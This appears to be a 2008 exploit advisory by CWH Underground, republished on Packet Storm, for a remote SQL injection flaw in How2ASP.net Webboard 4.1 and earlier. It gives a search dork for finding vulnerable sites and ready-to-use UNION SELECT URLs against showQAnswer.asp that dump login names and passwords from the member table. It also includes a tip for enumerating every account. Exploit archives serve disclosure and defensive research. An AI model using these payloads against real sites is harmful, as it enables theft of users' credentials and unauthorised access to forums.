How2ASP.net Webboard versions 4.1 and below suffer from a remote SQL injection vulnerability.
85431c6a61b45dfe183a7f8fe49e27479cca88d6d14404e14503572b2c145245==========================================================
How2ASP.net Webboard 4.1
Remote SQL Injection Vulnerability
==========================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 17 May 2008
SITE : www.citecclub.org
#####################################################
APPLICATION : How2ASP.net Webboard
VERSION : <= 4.1 #
VENDOR : http://howtoasp.net
DOWNLOAD : http://howtoasp.net/dl/app/wb41/webboard41.zip
#####################################################
DORK: "Powered by How2asp"
---Exploit---
http://[target]/[path]/showQAnswer.asp?qNo=441%20union%20select%201,2,Login,4,5,Password,7,8,9,10,11,12,13,14%20from%20member%00
http://[target]/[path]/showQAnswer.asp?qNo=[SQL Statement]
---NOTE/TIP---
You must know what columns number that appear on pages, Insert username or password into columns number
You can enumerate all username and password use ->
http://[target]/[path]/showQAnswer.asp?qNo=441%20union%20select%201,2,Login,4,5,Password,7,8,9,10,11,12,13,14%20from%20member
%20where%20Login%20not%20in%20('admin','test',....)%00
##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C #
##################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed